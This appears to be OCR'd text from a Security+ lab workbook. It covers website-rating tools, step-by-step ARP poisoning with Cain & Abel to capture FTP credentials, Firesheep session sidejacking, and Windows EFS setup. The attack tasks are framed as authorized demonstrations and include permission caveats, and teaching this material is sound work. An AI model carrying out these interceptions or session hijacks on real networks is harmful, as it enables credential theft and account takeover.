learn about McAfee Site Advisor, a tool designed to rank websites so that users can see if
they are safe to visit before ever clicking on that first link. A nice feature of this tool is that
it has been designed to work with third-party browsers.

Scenario

Your manager is concerned that Internet users may unknowingly be visiting malicious
sites. She has asked that you develop a solution to help end users make better browsing
choices.

Scope of Task

Duration

This task should take about 10 minutes.

Setup

For this task, you will need a Windows computer, access to the Administrator account, an
Internet connection, the Firefox web browser, and the ability to download files.

Caveat

Although website-rating tools can help users evaluate the safety of a site before visiting it,
this type of tool does not prevent the user from clicking on the link and proceeding even
though there could be danger.

Procedure

In this task, you will learn how to run McAfee Site Advisor.

Equipment Used
For this task, you must have:
= A Windows computer

= Access to the Administrator account
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= An Internet connection

s The Firefox web browser

Details

This task will show you how to install and run McAfee Site Advisor. This program will
allow you to evaluate the safety of websites before visiting. This tool is offered for free from
McAfee.

Installing and Running McAfee Site Advisor

1. Once you have accessed your Windows computer and have logged in as Administrator,
open your Firefox browser, go to www.siteadvisor.com/download/windows.html, and
click Download.

2. Once you start the download, the program will prompt you to accept the licensing
agreement. Once you choose Yes, the download will begin.

3. Upon completion of the download, Firefox will prompt you to install the McAfee
plug-in. After installation, you will be prompted to restart Firefox.

You have asked to install the following ierm:

— SiteAdvisor Firefox Extension MeArze, inc.
ﬁ from: http:f/download mcafee.com/products/sa/fir

Malicious software can damage your computer or violate your
privacy.
You should only install software from sources that

you trust.

4. Once Firefox restarts, Site Advisor will be installed and running. If you perform a
Google search, the results will now show Site Advisor information. The search shown
here for song lyrics shows the final site with a red x, as it may be unsafe.
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6. A full review of the site can be obtained by clicking in the Site Advisor pop-up.
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Are you the owner of this site? Leave a comment

Contact information: Establishedin Country  Popularity
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Criteria for Completion

You have completed this task when you have downloaded McAfee Site Advisor, installed it
on a Windows system, and used it to develop better browsing habits.
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Task 3.7: ARP Poisoning with
Cain & Abel

Computer security is something the Security+ certified professional must always be
thinking about. In addition to security countermeasures and controls, a security
professional must understand the ways in which attackers bypass security. This task will
examine one of these bypass methods.

This task will examine Address Resolution Protocol (ARP) poisoning. ARP is used to
resolve known IP addresses to unknown (MAC) physical addresses. ARP poisoning allows
an attacker to bypass the functionality of a switch. This makes it possible for an attacker
to attempt a man-in-the-middle attack and to intercept traffic that they would not normally
be able to access.

Scenario

Your manager is concerned about the security provided by Ethernet switches. He has asked
you to set up a demonstration to show the IT director how switches can be bypassed. The
objective in this exercise is to gain support for stronger security controls and push for
policy changes to block many clear-text protocols, such as FTP and Telnet.

Scope of Task

Duration

This task should take about 15 minutes.

Setup

For this task, you will need a Windows computer, access to the Administrator account, an
Internet connection, one or more switches, and the ability to download files.

Caveat

Although many security tools can be used for positive purposes, they can also be used
maliciously; therefore, always obtain permission before installing any tool that may be
viewed as malicious.

Procedure

In this task, you will learn how to run Cain & Abel to perform ARP poisoning.
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Equipment Used

For this task, you must have:

A Windows computer
Access to the Administrator account

An Internet connection

Details

This task will show you how to install and run Cain & Abel. While the tool has many uses,
this task will look specifically at how the tool is used for ARP poisoning.

Installing and Running Cain & Abel

1.

Once you have accessed your Windows computer and have logged in as Administrator,
open your browser, go to www.oxid.it/cain.html, and click the link to download
Cain & Abel.

Once you start the download, the program will prompt you to accept the licensing
agreement. Once you choose Yes, the download will begin.

Upon completion of the download, you will be prompted to download WinPcap. This
is a low-level packet driver that is needed for the program to function properly.

Once installed, Cain will be accessible from a shortcut placed on the Desktop of your
computer. Double-clicking the icon will allow you to start the program.

There are eight tabs on this interface:

Decoders This tab contains password-decoder tools.

Network This tab contains a set of network enumeration tools.
Sniffer This tab features sniffing tools.

Cracker This tab contains dictionary, brute-force, and rainbow table password-
cracking tools. Rainbow tables are an alternative to traditional brute-force password
cracking. Whereas traditional password cracking encrypts each potential password
and looks for a match, the rainbow table technique computes all possible passwords
in advance. This is considered a time/memory trade-off technique. Rainbow tables
facilitate the quick recovery of passwords and allow them to be cracked within a few
seconds.

Traceroute This tab contains a route-tracing tool.
CCDU This tab contains Cisco router tools.
Wireless This tab features wireless-network-discovery tools.

Query This tab features database-discovery tools.
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File View Configure Tools Help

e HEE +y ¥ L mEEIO® 0 i
&, Decoders |§ MNetwarlk Mﬂ Sniffer I@f Cracker Iﬁ Traceroute |lﬂ| Ccou |[‘21"] Wireless |5) Query |
& Cached Passwords

@ Protected Storage Press the + button on the toolbar to dump the Pratected Storage

¥ 152 Secrets

M \Wireless Passwords

& 1E7 Passwords

5 windowes Mall Passwords

£ Dialup Passwords

[== Edit Boxes

“B Enterprise Manager

¥ Crodential Managsr

[<_] 1 [i
Q Protected Storage

http: /ey oxid, it

Select the Sniffer tab. Notice at the bottom of the page there are now the following
additional tabs:

Hosts This tab features host tables.

ARP This tab features ARP spoofing.

Routing You’ll find routing-protocol sniffing tools on this tab.
Passwords This tab contains captured or sniffed passwords.

VoIP This tab contains voice-over IP (VoIP)-sniffing tools.
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File WView Configure Tools Help
oRehEE +yv B VDEE0®2 02 1
Decoders | @ network | B8 oniffer |&f cracker |4 Traceroute |M coou |8 wireless | ouery |
IP address | MAC address | QUI fingerprint | Host name | B | Br. | BS | Gr | MO | M
(] 11} | [l]
Hosts I@ APR |'§’ Routing I% Passwords |@’5 VolP I
http: /fwwewe oxid. it Y
Use caution when experimenting with unknown tools. It is advisable to use
TE such tools on a test network to avoid disrupting production traffic.

6. Right-click anywhere on the page and choose Scan MAC Addresses. This will build a
table of MAC-to-IP addresses that is needed to perform ARP poisoning.
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File WView Configure Tools Help
DweodhB®R | +v/k s uvmrEEeO® s 02
Decoders | @ network |88 sniffer [& cracker |8 Traceroute | B8 coou |8 wireless |E query |
IP address | MAC address | OUI fingerprint | Host narme | Bi.. | Bl | B3 | Gr | MO | |
Scan MAC aAddresses
Resalve Host Name
Remove Delete
Remave All
Clear Promiscuous-Mode Results
Export
% I | (2
Hosts | @ PR [ Routing | Passwords [ varP |
Lost packets: 0% A

Once the host scan is completed, you will be provided with a list of all devices that
responded to the initial ARP request.
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File View Configure Tools Help

awedhB®n | +v/ s yvmEEaO®E 02 0

Decoders | @ Network |88 sniffer [& cracker |8 Traceroute |B ccou |8 wirsless |55 ouery |

IP address | MAC address | OUI fingerprint | Host name |e..le..|es |G [mom
192.168,123.22 001601D13DSC  Buffalo Inc.
192,168,123.20 001SE900SS06 D-Link Corporation
192.168.123.1... O0ED110SFOS2  Uniden Corporation
192.168.123.1... 0009SB1FZ503  Netgear, Inc.
192.168.123.1.,. 001SE9DDSS06 D-Link Corporation
192.168.123.1... 008077DFB94AE  BROTHER INDUSTRIES, L...
192.168.123.1... 304694469FFD

192.168.123.1.,. 00234D704F20 Hon Hai Precision Ind. Co...
192.168.123.1.,. 304694469ECF

192.168.123.1.,. O00E3BOGERSE Hawking Technologies, Inc.
192.168.123.2... 001C10FS619C Cisco-Linksys, LLC

(1"} I &]I
Hosts | @ aPR |4 Routng [ Passwords [ vaP |
Lost packets: 0% |

Choose the ARP tab at the bottom of the page. This will take you to the ARP
poisoning section of Cain. On the left side of the screen, you will see some of the
ARP poisoning techniques that Cain can attempt.
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File WView Configure Tools Help
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9. To select which targets to perform ARP poisoning against, select the + at the top of the
page. This will cause the New ARP Poison Routing selection box to appear.

‘New ARP Poison Routing ‘

WARNING 1!

all othy

[APR enables you to hiiack IP traffic between the selected host on the leftist and al selected hosts on the right it in both
directions. If a selected host has routing capabilties WAN traffic wil be intercepted a well. Please note that since pour
machine has not the same perfoimance of a router you could cause DoS if you set APR between your Default Galeway and

er hosts an paur LAN.

IP address | mac [ Hostname (] | IP address | MAC [ Hostname [~ |
192168123111 OOEOT105FDS3 192168123130 DO24DT0AF20
192168123113 0003581F2603 192168123124 SM4ESAAEIFFD
192168123110 0015690 D850 N4E55463E
192168123114 (0G077OFBSAB

192168123120 30459AG9ECF 192168.123.110  OD1SESDDESIG
192168123024 J04694AE9FFD 192162123113 DOO9EEF2503
192168123130 00234D704F20 192162123111 DECT105FD53
192168123181 O00E 3BOEEBGE 192168123 20 005 SDDBA0E
192168123254 0O1CIOFEB13C 19216812322 ODYBOID13DSC
<] w <] I
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10. You will want to choose the gateway IP address and the local system you would like

to perform the ARP poisoning against. Doing so will allow you to intercept traffic
between these two systems.

File View Configure Tools Help
LB OHBER +yU R LI NEES0®EE 02 0

Decoders | P network |89 sniffer [« cracker [ Traceroute [T coou |87 wireless [ query |
¥ APR Status | 1P address | MaC address | Packets... | <- Pack... | MaC address |
& apR-Cert 92.168.173.... [0 |0 |ooso77Dredss ||
2 APR-DNS
B APR-SSH-1 ()
5 4PR-HTTPS (0)
T8 APR-RDP (0)
8 aFR-FTPS (@)
8 APR-POP3S (0) <

B APBR_IMAPRS

The real danger of ARP poisoning is that it allows an attacker to see
TE traffic on a switched network that would not normally be visible. For
example, if a user performs a transfer to an FTP server on the Web, ARP

poisoning would allow the attacker to capture the FTP password even

though the network is switched and that type of traffic would normally
be blocked.

11. Once the IP addresses are selected, click the yellow nuclear icon at the top-left corner
of the page. This will start the ARP poisoning attack.

Status IP address MAC address | Packets... | <- Pack... | MAC address
APoisoning [ 192.165.123....

< I [}

12. While that ARP poisoning is occurring, you will notice that the screen says poisoning

in the status column. This will tell you that the attack is ongoing. The attack will
continue until you right-click and choose Stop.
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13. To fully appreciate the power of this attack, you will want to have someone at the
computer you are performing the poisoning attack against visit a website or FTP site
that uses clear-text authentication. As an example, you may want to use ftp://ftp
.microsoft.com/. After they have accessed the site, choose Passwords from the bottom
of the program screen.

= \

File WView Configure Tools Help
3 s © ol B Y % BYVEEBEaO®E % N
& Decoders IQ MNetwark |@ Sniffer |€f2 Cracker |ﬁ Traceroute IM Cccou |[(i'f] Wireless Iaj Query ‘

14 Passwords Timestamp ‘ FTF server | Client ‘ Username | Password
& FTP (2) 27/05/200... 207.46.236.1.. 192.168.123.. anorymous rozilla@exarmple.com
B HrTP (37) 27/05/200... 193.1.193.67  192.168.123... anonymous mazilla@exarnple.corm
IMAP (0}
LDAP (0}
b PoRz (2)
s SMB (0)
B Telnet (@)
VNG ()
Zb TS (M
Bo THS (m
3 SMTP (1)
T NNTP ()
DCERFC ()
153 MEkerbS-Fresuth (
B RadiusKeys ()
£ Radius-Usars (0}
#1cq @
5 [KE-PSK ()
&b mysaL @)
= swmip (2)
#a SIP ()
<& GRE/FPP ()
< PPPOE (0}

< ] I} | [)] Qﬁ Fe
@ Hosts |@ APR |'i" Routing |% Pasgwords I& WoIP ‘

Lost packets: 0%

14. From the passwords screen, you can see the different types of passwords that Cain
can capture. These include FTP, Telnet, HTTP, IMAP, POP3, and SMB. Notice in
the example how many passwords were captured in just the few minutes the tool was
allowed to run. Two FTP passwords were captured and are visible at the right of the
screen. While these were just demo passwords, consider the security threat had these
been real passwords and account details.
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To learn more about how ARP poisoning works, take a look at Phase 9 and
JTE consider running a protocol analyzer such as Wireshark (www.w1ireshark.org)
while performing this exercise.

Criteria for Completion

You have completed this task when you have downloaded Cain & Abel, installed it on a
Windows system, and used it to perform ARP poisoning.

Task 3.8: Attacking Authentication
with Firesheep

While cryptography may not be something that every Security+ certified professional
dreams about, you must understand the protection that cryptographic controls provide
and how they can be used to secure assets and control access. Many websites use weak
encryption or none at all. This task will examine one of the methods used to bypass
authentication.

This task will examine one method to attack authentication and perform a sidejacking
attack with Firesheep. Sidejacking is possible as many websites only initially use encryption
to gain access to an account. Once established, access is maintained by means of a cookie.
Cookies are used to validate users to Facebook, Twitter, and other sites through an
unencrypted channel. Firesheep allows a hacker to steal a user’s cookie. With this cookie, a
hacker or malicious individual will have full access to the victim’s/user’s profile.

Scenario

Your manager is concerned about the security provided by websites that use cookies. He
has asked you to set up a demonstration to show the I'T director how sidejacking works and
to investigate whether your company’s new web portal is vulnerable.

Scope of Task

Duration
This task should take about 15 minutes.
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Setup

For this task, you will need a Windows computer, access to the Administrator account, a
wireless Internet connection, one or more switches, and the ability to download files.

Caveat

Although many security tools can be used for positive purposes, they can also be used
maliciously; therefore, always obtain permission before installing any tool that may be
viewed as malicious.

Procedure

In this task, you will learn how to run Firesheep to perform sidejacking.

Equipment Used

For this task, you must have:

= A Windows computer

= Access to the Administrator account

s A wireless Internet connection

Details

This task will show you how to install and run Firesheep. This task will look specifically at
how the tool is used for sidejacking attacks and the vulnerability of some sites.

Installing and Running Firesheep

1. Once you have accessed your Windows computer and have logged in as Administrator,
open your browser, go to http://codebutler.github.com/firesheep/, and click the
link to download Firesheep.

2. Upon completion of the download, you also need to download WinPcap from the
same URL. This is a low-level packet driver that is needed for the program to function
properly.

If you have installed WinPcap for a previous task, you will not need to
TE install it again.

3. Once the program is downloaded, install Firesheep by dragging it into the Firefox
Tools Add-On menu.
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X

Software Installation

,i: Install add-ons only from authors whom you trust.
.

Malicious software can damage your computer or violate your privacy.

‘ou have agked to install the following item:

firesheep-0.1-1.xpi fAuvthor not varifisd)
filer1//C: fhemp/dawnloads freshesp-0.1- 1 xpi

Install Waw.

4. While in Firefox, select View » Sidebar > Firesheep to display the tool.

2) Firefox Updated - Mozilla Firefox

Edit Histary  Bookmarks Tools  Help

File:

Toolbars 3 -
Status Bar ltp‘ﬂp’www.mozllla‘comﬂen-USIF\reFoxfa‘6‘ Lafwhatsnew

Bookmarks  Ctri+6

(2] Mast visil
Higtory  Clrl+H
@rirefo; " e Fireshesp  Shift+Ctri+s  (age EE
Relnad Ctr+R
Zoom v
Page Style v
Cheracter Encading~ »

e 2w ks for upgrading to Firefox

Full Screen Fi1
And for supporting Mozilla’s mission of promoting openness, innevation and opportunity

BROWS
FUTUR

Be one of

feedback

* fuyesc
e Brand
* Tons of

Join the

5. Click Start Capture. This will cause the program to begin sniffing for traffic that can
be sidejacked.

2) Firefox Updated - Mozilla Fire}

Fle Edb View History Bookmarl
- C X & (4

(2] Mast Visited P Getting Started 5]

Firesheep x

Stop Capturing
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6. If someone logs into a vulnerable website, you can view their credentials or even
double-click on the name and gain access to their account.

Firesheep X

Stop Capburing

Alice, or perhaps Bob
Windows Live
Alice, or perhaps Bob
wWindaws Live

IS TheSolutionFirm
By Twitter

Never access anyone’s account that you do not have permission to view. In
TE most areas, doing so may be considered a computer crime.

Criteria for Completion

You have completed this task when you have downloaded Firesheep, installed it on a
Windows system, opened it in Firefox, and used it to perform a sidejacking attack.
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An important aspect of protecting your information and
information systems is the secure storage of your valuable
information assets. To complement physical security controls,
such as a locked server room, sensitive information should have tight permissions and

be encrypted while in storage (on the hard drive). That way, encryption protects the
confidentiality of your information assets. Further, because unauthorized users cannot
access the encrypted information, they cannot make unauthorized changes to the
information, thus protecting the integrity of the information.

Many encryption utilities and even devices are available that can help you secure your
critical and sensitive information assets. Some encryption technologies are even built into
operating systems, such as the Encrypting File System (EFS) and the newer disk-encryption
technology from Microsoft, BitLocker. Symanetc Endpoint Encryption (www.symantec
.com/business/endpoint-encryption) and PGP Corporation (www.pgp.com/) provide
third-party encryption tools.

Another aspect of protecting your information assets has to do with ensuring the
availability of the information assets. You should be knowledgeable about fault-tolerant
disk arrays, such as RAID systems, and know how to perform routing backups and data
recovery from backups to increase the availability of these assets.

The tasks in this phase map to Domains 3, 4, 5, and 6 objectives in
TE the CompTIA Security+ exam (http://certification.comptia
.org/security/).

Task 4.1: The Encrypting File System

Windows 2000 and above provide security for files in storage on NTFS volumes. This is
called the Encrypting File System (EFS). EFS operates as an additional layer of security,
complementing both the NTFS and share-point permissions on Windows systems.

EFS should be implemented for any sensitive data. Because of the increased frequency of
portable devices being lost or stolen, it is especially important to implement EFS on laptop
computers.
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Scenario

You are responsible for the protection of sensitive information that often gets produced and
utilized on company-owned laptop computers. On occasion, these laptops and sensitive
files must be shared among several top-level executives of the company.

Scope of Task

Duration
This task should take approximately 2 hours.

Setup

You will create secured (encrypted) content and confirm that it is secure. Then you will
provide access to this content for selected other user(s).

Caveat

With the addition of any securing technology, there will be an increase in administrative
overhead to support that technology. It is possible that users will lock themselves

out of their sensitive content, requiring a preconfigured Data Recovery Agent (Local
Administrator for Workgroup mode systems, configured manually, or the administrator of
the domain for domain members, automatically configured) to decrypt the content.

5 See Task 4.2 for detailed instructions on the data-recovery procedure.
TE

Further, there are combinations of events that can prevent decryption of the content. Data
can be lost permanently.

As an administrator, implement EFS with care. If you implement EFS for your users,
provide proper training and warnings to those users regarding these issues.

Procedure

For this task, you must create the Data Recovery Agent policy.

Then you will need to create two standard (nonadministrator) users: Userl and User2.
Userl will create and secure sensitive content. You will then log on as User2 and confirm
that even though NTFS permissions should allow access to the content, EFS does not allow
User2 to access the content.

Next you’ll log on as Userl again and add User2 to the list of users who can access the
encrypted file.

Then you’ll log back on as User2 and confirm that you now can access the encrypted
content as User2.
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Equipment Used

For this task, you must have:
= Windows XP Pro system with the following configuration:

= A member of a workgroup (not a member of a domain)
s At least one NTFS volume

s Local Administrator access

Details

Configuring the Volume for EFS

1. Logon to the Windows XP Pro system as the Local Administrator.

2. Launch Explorer by right-clicking the Start button and selecting Explore.
3. Select the root of the C:\ drive in the left pane.

)’ You may have to enable viewing of the folders and files on the C:\ drive by
A TE selecting Show The Contents Of This Folder in the right pane.

4. Right-click on the C:\ drive and select Properties.
5. Confirm that the volume’s file system is NTFS, and then click OK.

EFS is not available on any FAT file systems, including floppy disks. It is
TE available only on volumes formatted with NTFS.

Local Disk (C:) Properties

GE"EH'lToo\s Hardware | Sharing | Security | Quota

Type: Local Digk
File system:  MTFS

W Used space 1.575,280, 640 bytes 1.46GB
B Fres space 2.710.056,960 bytes 252GB
Capacity: 4.285,337.600 bytes 399GE

Drive C Disk Cleanup

[[] Compress drive to save disk space

Allows Indexing Service to index this disk for fast file searching
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6. In the right pane, right-click in the white area and select New > Folder. Name the
folder GOODSTUFF.

Right-click the new GOODSTUFF folder and select Properties.

In the Properties dialog box, select the Security tab. Under Group Or User Names,
select Users ComputerName\Users on the list of Group Or User Names, where
ComputerName is the name of your computer.

2

e N ’_ A mml GOODSTUFE Properties
Back ~ () P ) search |17 Folders —
2 = [ —
s s | General || Shalingl Security ‘Customize\
Address (& C;
| \ GTDLID or Usel names:
Folders i Marne: - -
@ Desktop | Config.Msi ﬁ Administrator [<F1\Administrator]
2} My Documents [CT)Documents and Setti ﬁjAdministlalors [*P1%Administrators)
ER R [CProgram Files !ﬁ CREATOR OWMER
4 3% Floppy (a1 ) System Yolume Infar ﬁs SYSTEM
e SY5_BOOT (C) [CIWINDOWS €7 Users P14 sers)
L D Drive (D) [wuTemp

(} Control Panel ElaUTOEKEC BAT Add..
S My Netwark Places _boot.ini
y Recydls Bin EI]CONFIG.S\"S Pemiszions for Users Allow Deny
[Ho.5v5 Full Contral O O &
4_21 MSDOS, 575 Moty O 0O
jNJdDETECT'COM Fead & Execute O
=i y List Folder Contents L}
i‘al]pageflle.sys Fread 0
2 =
GOODSTUFF :
= Wirite: , O «
< For special permigsions ar for advanced settings,
click Advanced.
[ Ok l [ Cancel l [ Apply l

In the case shown, the computer name is XP1.

9. Enable the Write permission under Permissions For Users. Click OK. You have now

confirmed that the volume supports EFS and you have created a storage location for
the local users of the system.

Creating Users

1.

Right-click on My Computer and select Manage to open the Computer Management
console.

Expand Local Users And Groups. Select the Users subfolder.
In the right pane, right-click in the white space and select New User.

Type Userl for both User Name and Full Name. Type Password1 in the Password
and Confirm Password fields. Clear the option User Must Change Password At Next

159
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Logon, and enable the options User Cannot Change Password and Password Never
Expires. Click Create.

The setting User Must Change Password At Next Logon is grayed out when
TE you enable the User Cannot Change Password or the Password Never

Expires settings.

New User
User name: |Useﬂ
Full name: |Useﬂ
Descriptian: |
Passward: |u.uuu |
|......... |

Canfirm password:

Uger must change pazsward at nest logon
User cannat change password
Pazzword never expires
[ Account is disabled

5. You will see a new, empty New User dialog box. Type User2 for User Name and Full
Name. Type Password1 in the Password and Confirm Password fields. Clear the option
User Must Change Password At Next Logon, and enable both User Cannot Change
Password and Password Never Expires. Click Create.

6. Click Close. Confirm the existence of the two new user accounts for Userl and User2.

O/ Computer Management (=13
=) File  Action  Yiew Window Help =12l %]
& |Em| 2
Computer Management (Local) Mame: Full Name [ Description
= ly System Tools A5 dmiristrator Built-in account for administering t
[+l Event Yiewsr Guest Built-in account For guest access to)
* % Sha'rd FD'dE’Sd ®iHelpAssistant  Remote Desktop Help Assi...  Accaunt for Providing Remats Assi
E La”[au"'ws and Groups #5SUPPORT_38... CN=Microsoft Corparation...  This is a vendar's account for the -
a sz:s HFusent Usert
=-&& Petformance Logs and Alerts Busere Userz
Device Manager
=) Storage
=) Removable Storage
Disk Defragmenter
Disk Management
) 8 Services and Applications
sl ETES | &

7. Minimize the Computer Management console by clicking the X in the upper-right corner.
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Creating the EFS Data Recovery Agent Policy

1. To define an EFS Data Recovery Agent (DRA) policy, you must produce a DRA
certificate for the local administrator. Still logged on as Local Administrator, open a
command window by selecting Start » Run and entering CMD. Then click OK.

2. You will create a location to hold the certificates and view the properties of the
command (Cipher) used to create the certificates. At the command prompt, enter
the command cd\. Press Enter, which returns you to the root of the C:\ drive.

3. At the command prompt, enter the command md AA. Press Enter to create a new folder
called C:\AA.

4. At the command prompt, enter the command cd AA. Press Enter to place your focus in
the new C:\AA folder.

5. At the command prompt, enter the following command and view the results:
Cipher /7?

6. To create the certificates required for EFS Data Recovery, at the command prompt
enter this command:

cipher /R:c:\AA\AdminEFSDRA

o C:\WINDOWS\system3

them to a .PFX file (containing certificate and private key> and
a .CER file <{containing only the certificate). An administrator
may add the contents of the .CER to the EF% recovery policy to
create the recovery agent for users, and import the .PFR to
recover individual files.

/8 Performs the specified operation on directories in the given
directory and all subdirectories.

~U Tries to touch all the encrypted files on local drives. This will
update user’s file encryption key or recovery agent’s key to the
current ones if they are changed. This option does not work with
other options except /M.

W Removes data from available unused disk space on the entire

yolume. If this option is chosen, all other options are ignored.

The directory specified can be anywhere in a local voelume. If it

is a mount point or points to a directory in another volume. the

data on_that volume will be removed.

n Backup EFS certificate and keys into file filename. If efsfile is
provided, the current user’s ceptificateds? used to encrypt the
file will be backed up. Otherwize, the user’s current EFS
certificate and keys will he backed up.

directory A directory path.

filename A filename without extensions.

pathname Specifies a pattern. file or directory.
efsfile An encrypted file path.

Used without parameters. GIPHER displays the encryption state of

the current directory and any files it contains. You may use multiple
directory names and wildcards. You must put spaces betuween multiple
parameters.

:~AA>cipher #R:ic:vaa~AdminEFSDRA
lease type in the password to protect your .PFX file:

7. Type the password Password1 and press Enter.
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v - cipher JR:c:\aa\AdminEFSDRA

icrosoft Windows XP [Uersion 5.1.26801]
{C» Copyright 1985%-2801 Microsoft Corp.

:S>cipher ZRic:Naa“AdminEFSDRA
lease type in the password to protect your .PFX file:
lease retype the password to confirm:

8. To confirm the password, type Password1 a second time and press Enter. The two
certificates for DRA are produced in the C:\AA folder.

9. Close the command window.
10. Select Start » Programs » Administrative Tools » Local Security Policy.

11. In the Local Security Settings dialog box, expand Public Key Policies and select
Encrypting File System.

& Local Security Settings

File  Action View Help

e g EE 2

@ Securiby Sektings Issued To Tssued By Bl
+- {18 Account Polices ] o
-8 Local Palicies There are no items ko show in this view,

=1 Public Key Policies

-1 Software Restriction Policie
+ g IP Security Policies on Loca

< | 3 | |

|

Encrypting File System store contains no certificates.

12. Right-click on Encrypting File System and select Add Data Recovery Agent. This
launches the Add Recovery Agent Wizard. Click Next.
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14.

15.
16.
17.
18.
19.
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Add Recovery Agent Wizard

Select Recovery Agents
Only uzers who have recovery agent certificates can be designated as recovery

agents.

Select the uzers you want to designate ag recovery agents. You may select the uzers
directly from Active Directory if the certificates are published in the directorp. Othernwize,
you need certificate [ cer) files for the users you want to designate.

Reoovery agents:

Usgers Certificates

Brrowze Folders. .

[ < Back H Ment > ][ Cancel ]

On the Select Recovery Agents screen, click the Browse Folders button and browse
to C:\AA.

Select the AdminEFSDRA. cer file that you just created with the Cipher command. Click
Open. This pulls the certificate file into the Add Recovery Agent Wizard.

Add Recovery Agent Wizard 5_<|
Select Recovery Agents
Only users wha have recoveny agent cerificates can be designated as recoverp
agents.

Select the ugers you want to designate as recoveny agents. You may select the users
directly from Active Directory f the certificates are published in the directory. Otherwise,
you need cetificate [ cer] files for the users you want to designate.

Recovery agents:

Users Certificates

USER_UMKNOWM Administrator
Browse Folders

[ < Back ” Next > ][ Cancel

Click the Next button, and then click Finish.

Close the Local Security Settings dialog box.

Right-click the Start button and select Explore.

Open the folder C:\AA.

Right-click on the file AdminEFSDRA.pfx and select Install PFX.
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File Edit View Favorites Tools  Help

Qe - Q- ¥ /'f‘i Search [ 37 X ©) |[m-
Address (2 Chan v Beo

Folders X | Mame Size | Type
(5 Desktap EdadminerFsoRa CER 1KE Security Certificat
1) My Documents 5% AdminEFSDRA PFX 2KB Personal Informati
= i wp1 Install PFX 1KE  Windows NT Comn
4 3% Floppy (A2) Open With...
B e 5Y5_BOOT (C1) send To R
12 an
IC3) Documents and Settings Cut
153 GOCDSTUFF Copy
1) Program Files
) RECYCLER
I3 System Volume Informat;
1 WINDOWS W
1) wTemp Properties
(LY WXPVOL_EN (D)
@ contral Panel

# ™ Shared Noruments L
< | ¥

EIEIX
1','

[ Folders

>

Create Shortcut
Delete
Rename

[~
v

20. In the Certificate Import Wizard, click Next.

21. Confirm the certificate file with the .PFX extension is entered in the File Name field.
Click Next.

)r The filename may be presented in the older DOS 8.3 short filename format:
TE

A C:\AA\ADMINE~1.PFX.This is acceptable.

22. Enter the password Password1 to access the private key associated with the certificate.

This password was implemented in the two certificates created with the
A TE Cipher command earlier.

23. Leave the two check boxes deselected and click Next in the wizard.

24. Allow the Certificate Store location to be automatically selected, and click Next in the
wizard.

25. Click Finish. You should see a message reporting that the import was successful. Click
OK to clear the message.

26. Log off as Local Administrator by selecting Start » Log Off Administrator.

27. You have now confirmed and configured the C:\ drive for EFS, you have created two
users to implement EFS, and you have successfully configured the local administrator
as the EFS Data Recovery Agent.

Creating EFS Content as User1

1. Log on to the local computer as Userl with the password Password1.

2. Launch Explorer by right-clicking the Start button and selecting Explore.
3. Select the root of the C:\ drive in the left pane.
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)/ You may have to enable viewing of the folders and files on the C:\ drive by
A TE selecting Show The Contents Of This Folder in the right pane.
4. In the right pane, double-click the folder GOODSTUFF.
5. Right-click in the white space in the right pane and select New » Text Document.
6. Rename the text document Secrets. txt.
7. Open Secrets.txt with Notepad and type a message.
8. Save Secrets.txt with the new content.
9. Close Notepad.
10. Right-click Secrets.txt and select Properties.
11. In the Properties dialog box, on the General tab click Advanced.

Secrets.txt Properties

General |Securitp Summary

@

‘Secrels.lxl |

Typeoffile:  Test Document
Opens with:  [J Motepad

Location. CAGODODSTURF
Size: 0 bytes

Size on disk. 0 bytes

Created: Today, August 28, 2006, 3:45:34 PM
Maodified: Today, August 28, 2006, 3:45:34 PM
Accessed: Today, August 28, 2006, 3:45:34 PM

Attributes: [JRead-only [ Hidden

12. In the Advanced Attributes dialog box, enable the option Encrypt Contents To
Secure Data.

Advanced Attributes

Choose the options you want For this file.

archive and Tndex attributes

File is ready for archiving
For Fast searching, allow Indexing Service ko indes this file

Compress or Encrypl atbributes
[[] compress contents ta save disk space

Encrypt contents ko secure data
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13. Click OK.

14. Click Apply in the Properties dialog box. You will be prompted to either encrypt the
folder and all content or encrypt just this one file. Select Encrypt The File Only.

TE

15. Select the Security tab of the Properties dialog box. Select the Users group in the top
pane. Notice that users of the local system have Read & Execute, Read, and Write

Phase 4 = Secure Storage

Notice that if you also try to enable compression, the Encrypt Contents To
Secure Data check box clears. Encryption and compression are mutually
exclusive for content on NTFS volumes.

Encryption Warning

*ou have chosen ko encrypt a file that is nat in an encrypted
' falder. The file can become decrypted when it is maodified.

Because files saved in encrypted Folders are encrypted by
default, it is recommended that you encrypt the file and the
parent Folder,

‘hat do you want to do?

(O Encrypt the file and the parent Folder

(®) Encrypt the file only

[ Always encrypt anly the file

EFS can be implemented for a single file at a time or can be implemented
at the folder level. When EFS is implemented at the folder level, any newly
created files or folders in the EFS folder inherit the encryption attribute
and will be encrypted with the EFS encryption key of the owner/creator of
the new content.

permissions inherited from parent folders. Click OK.

Secrets.txt Properties @

Goneral | Secuiiy | Summany

Graup or user names:
!ﬁ Administrators P11 \Administrators)
€7 SvSTEM

€ Userl (xP1\Usen)

Permissions for Users Allow Deny
Full Contral O O
Madify O O
Read & Execute O
Fiead O
“frite O

Special Permissions

For special permissions or for advanced settings,
click Advanced.
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)’ Notice in Explorer that Secrets. txt is displayed in green (the default color
‘d'rs and settings) to indicate its EFS status.

16. Open Secrets.txt with Notepad and view your message to confirm that you can
access the data even though the file is now encrypted.

17. Close Notepad.

Attempting Access to EFS Content as User2

1. Log on to the local computer as User2 with the password Password1.

2. Launch Explorer by right-clicking the Start button and selecting Explore.
3. Select the root of the C:\ drive in the left pane.

You may have to enable viewing of the folders and files on the C:\ drive by
TE selecting Show The Contents Of This Folder in the right pane.
In the right pane, double-click the folder GOODSTUFF.

Attempt to open Secrets.txt. Notepad launches, but even though you just confirmed
that you have permission to read the Secrets.txt document, you get the error message
Access is denied. EFS has this document encrypted so that only Userl and the EFS
Data Recovery Agent can decrypt the file.

6. Click OK to clear the error message, and then close Notepad.

Creating EFS Content as User2

1. Still logged on as User2, in the GOODSTUEFF folder in Explorer, right-click in the
white space in the right pane and select New » Text Document.

Rename the new text document User2Secrets. txt.

Open User2Secrets. txt with Notepad and type a message.
Save User2Secrets. txt with the new content.

Close Notepad.

Right-click User2Secrets.txt and select Properties.

Click Advanced.

Enable Encrypt Contents To Secure Data.

Click OK in the Advanced Attributes dialog box.

. Click Apply in the User2Secrets.txt Properties dialog box. You will be prompted to
either encrypt the folder and all content or encrypt just this one file. Select Encrypt The
File Only.

© 0o N o G~ DN

-
o
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In order for User1 to enable User2 to decrypt Secrets.txt, User2 must, at

TE least on one file, enable EFS on this system. This generates the encryption
key for User2 so that User1 can enable the access to Secrets.txt using
